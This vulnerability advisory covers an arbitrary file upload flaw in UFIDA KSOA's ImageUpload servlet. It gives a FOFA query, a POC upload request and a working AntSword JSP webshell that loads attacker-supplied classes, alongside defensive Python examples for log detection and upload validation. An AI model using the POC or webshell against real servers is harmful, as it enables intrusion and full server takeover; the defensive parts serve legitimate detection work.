1. Product introduction
UFIDA KSOA is a new-generation product developed under the guidance of the SOA concept. It is a unified IT infrastructure built around the current IT needs of distribution companies, allowing the IT systems a distribution company has established in different periods to communicate with each other easily. It helps distribution companies protect their existing IT investment, simplify IT management, enhance competitiveness, and ensure the realization of the company's overall strategic goals and innovation activities.
2. Vulnerability overview
There is an arbitrary file upload vulnerability in the ImageUpload servlet of the UFIDA KSOA platform; through it an attacker can obtain server privileges.
3. Affected versions
UFIDA Enterprise Information Integration Platform KSOA v9.0
4. Reproduction environment
FOFA:app="Yonyou-Time and Space KSOA"
5. Vulnerability reproduction
Capture the home page request with Burp and send it to the Repeater module for reproduction.
POC
POST /servlet/com.sksoft.bill.ImageUpload?filename=[uploaded filename]&filepath=/ HTTP/1.1
Host: your-ip

[file contents]
Reproduced successfully
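The request above leaves a clear trace in the web server's access log. As an added example (it is not part of the original write-up and not the vendor's software), the following Python script shows how a defender can scan access-log lines for the ImageUpload endpoint receiving a filename with an executable (JSP) extension or a traversal sequence in filepath, and for a later request of the uploaded name from the same client, which is the footprint of a successful webshell drop. The log lines, the extension list and the combined-log regex are constructed for the example; the endpoint path is the one from this advisory.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines in combined access-log format; they are not real
# traffic from the affected product and only exist to exercise the checks.
SAMPLE_LOG = """\
10.0.0.5 - - [12/Mar/2024:10:01:02 +0000] "POST /servlet/com.sksoft.bill.ImageUpload?filename=logo.png&filepath=/ HTTP/1.1" 200 17
10.0.0.9 - - [12/Mar/2024:10:02:15 +0000] "POST /servlet/com.sksoft.bill.ImageUpload?filename=shell.jsp&filepath=/ HTTP/1.1" 200 17
10.0.0.9 - - [12/Mar/2024:10:02:16 +0000] "GET /shell.jsp?passwd=AAAA HTTP/1.1" 200 512
10.0.0.7 - - [12/Mar/2024:10:03:00 +0000] "POST /servlet/com.sksoft.bill.ImageUpload?filename=report.pdf&filepath=../../webapps/ROOT/ HTTP/1.1" 200 17
10.0.0.3 - - [12/Mar/2024:10:04:00 +0000] "GET /index.jsp HTTP/1.1" 200 2048
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+$'
)

UPLOAD_PATH = "/servlet/com.sksoft.bill.ImageUpload"   # endpoint named in the advisory
# Extensions a servlet container will execute; an upload carrying any of them
# (also as a middle extension such as x.jsp.png) deserves a look.
EXECUTABLE_EXT = {"jsp", "jspx", "jspf", "jsw", "jsv"}


def has_executable_ext(filename):
    """True if any extension segment after the first dot is a JSP variant."""
    segments = filename.lower().split(".")
    return any(seg in EXECUTABLE_EXT for seg in segments[1:])


def analyze_upload(query):
    """Return the reasons an ImageUpload query string looks abusive ([] if clean)."""
    params = parse_qs(query)            # parse_qs already percent-decodes values
    filename = params.get("filename", [""])[0]
    filepath = params.get("filepath", [""])[0]
    reasons = []
    if has_executable_ext(filename):
        reasons.append(f"executable extension in filename={filename!r}")
    if ".." in filepath.replace("\\", "/").split("/"):
        reasons.append(f"path traversal in filepath={filepath!r}")
    return reasons


def scan_log(text):
    """Scan access-log text; return a list of findings in log order.

    Besides flagging risky uploads, it remembers every filename uploaded per
    client IP and flags a later request for that same name, which is what a
    successful webshell drop looks like in the log.
    """
    findings = []
    uploaded = {}                        # (ip, lowercased filename) -> upload line number
    for lineno, line in enumerate(text.splitlines(), 1):
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, method, target = m["ip"], m["method"], m["target"]
        parts = urlsplit(target)
        if parts.path == UPLOAD_PATH and method == "POST":
            for reason in analyze_upload(parts.query):
                findings.append({"line": lineno, "ip": ip, "reason": reason, "target": target})
            name = parse_qs(parts.query).get("filename", [""])[0]
            if name:
                uploaded[(ip, name.lower())] = lineno
            continue
        requested = parts.path.rsplit("/", 1)[-1].lower()
        if (ip, requested) in uploaded:
            findings.append({
                "line": lineno, "ip": ip, "target": target,
                "reason": f"uploaded file requested (upload at line {uploaded[(ip, requested)]})",
            })
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"line {f['line']:>3}  {f['ip']:<10} {f['reason']}")
```

Run against the embedded sample, the scan reports the JSP upload on line 2, the follow-up request for that file on line 3, and the traversal attempt on line 4, while the legitimate image upload on line 1 produces nothing. The per-IP correlation is what separates a noisy scanner from a successful drop; in a SIEM the same logic maps onto a two-event rule keyed on client IP and filename.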
6. Exploitation
The application is written in Java, so the next step is to upload an AntSword JSP one-line webshell directly; the connection password is passwd.
<%!
class U extends ClassLoader {
U(ClassLoader c) {
super(c);
}
public Class g(byte[] b) {
return super.defineClass(b, 0, b.length);
}
}
public byte[] base64Decode(String str) throws Exception {
try {
Class clazz = Class.forName("sun.misc.BASE64Decoder");
return (byte[]) clazz.getMethod("decodeBuffer", String.class).invoke(clazz.newInstance(), str);
} catch (Exception e) {
Class clazz = Class.forName("java.util.Base64");
Object decoder = clazz.getMethod("getDecoder").invoke(null);
return (byte[]) decoder.getClass().getMethod("decode", String.class).invoke(decoder, str);
}
}
%>
<%
String cls = request.getParameter("passwd");
if (cls != null) {
new U(this.getClass().getClassLoader()).g(base64Decode(cls)).newInstance().equals(pageContext);
}
%>
Verify that the uploaded file is parsed by the server.
It works; open AntSword and try to connect (remember to delete the backdoor after testing).
7. Remediation
Upgrade to a patched version or apply the vendor patch.
Reduce the application's Internet exposure, restrict the file types that may be uploaded, and enforce upload blacklist and whitelist constraints.
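To make the last suggestion concrete, here is an added Python example (it is not the product's code; the real servlet is Java and its rules are not on this page) of the validation an upload handler should perform: ignore the client-supplied directory entirely, allowlist image extensions, check the file signature against the declared type, store the file under a random name, and confirm the final path still lies under a root outside the web root. The upload root, the size limit and the allowed types are assumptions made for the example.

```python
import secrets
from pathlib import Path

# Constructed policy for this example; the product's real rules are not on the page.
# Only image types are accepted and each is tied to its file signature.
ALLOWED_SIGNATURES = {
    "png": (b"\x89PNG\r\n\x1a\n",),
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "gif": (b"GIF87a", b"GIF89a"),
}
MAX_BYTES = 5 * 1024 * 1024
# Assumption: a directory outside the servlet container's web root, so nothing
# written here can ever be served or executed by the container.
UPLOAD_ROOT = Path("/var/ksoa-uploads")

# Constructed sample bodies: a minimal PNG header and a JSP-looking text body.
SAMPLE_PNG = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16
SAMPLE_JSP = b"<%@ page language=\"java\" %>"


class UploadRejected(ValueError):
    """Raised with a human-readable reason when an upload fails policy."""


def validate_upload(filename, content, upload_root=UPLOAD_ROOT):
    """Return the Path the upload may be written to, or raise UploadRejected.

    The client-supplied directory (the vulnerable servlet's ``filepath``
    parameter) is deliberately not a parameter here: the server alone decides
    where files go. The client filename only contributes its extension; the
    stored name is random, so neither a traversal sequence nor a JSP name
    can reach the disk.
    """
    if not filename or "\x00" in filename:
        raise UploadRejected("empty or NUL-containing filename")
    # Keep only the last path component: "../x.png" and "dir\\x.png" both become "x.png"
    base = filename.replace("\\", "/").rsplit("/", 1)[-1]
    if "." not in base:
        raise UploadRejected("no extension")
    ext = base.rsplit(".", 1)[1].lower()
    if ext not in ALLOWED_SIGNATURES:
        raise UploadRejected(f"extension {ext!r} not allowed")
    if len(content) > MAX_BYTES:
        raise UploadRejected("file too large")
    if not any(content.startswith(sig) for sig in ALLOWED_SIGNATURES[ext]):
        raise UploadRejected("content does not match extension")
    root = upload_root.resolve()
    dest = (root / f"{secrets.token_hex(16)}.{ext}").resolve()
    # Belt and braces: the final path must still be inside the upload root.
    if root not in dest.parents:
        raise UploadRejected("destination escaped upload root")
    return dest


def upload_decision(filename, content):
    """Convenience wrapper returning 'accepted' or 'rejected: <reason>'."""
    try:
        validate_upload(filename, content)
        return "accepted"
    except UploadRejected as exc:
        return f"rejected: {exc}"


if __name__ == "__main__":
    for name, body in [("logo.png", SAMPLE_PNG), ("shell.jsp", SAMPLE_JSP),
                       ("shell.png", SAMPLE_JSP), ("../../ROOT/logo.png", SAMPLE_PNG)]:
        print(f"{name:<24} {upload_decision(name, body)}")
```

The design choice worth noting is that the extension allowlist alone is not the control: a JSP body renamed to .png is caught by the signature check, a .png name with traversal segments is harmless because only the extension survives, and even a bypass of every check would land the file outside the web root under a name the client never learns. Blacklists of known-bad extensions, by contrast, fail open on every variant the list author forgot.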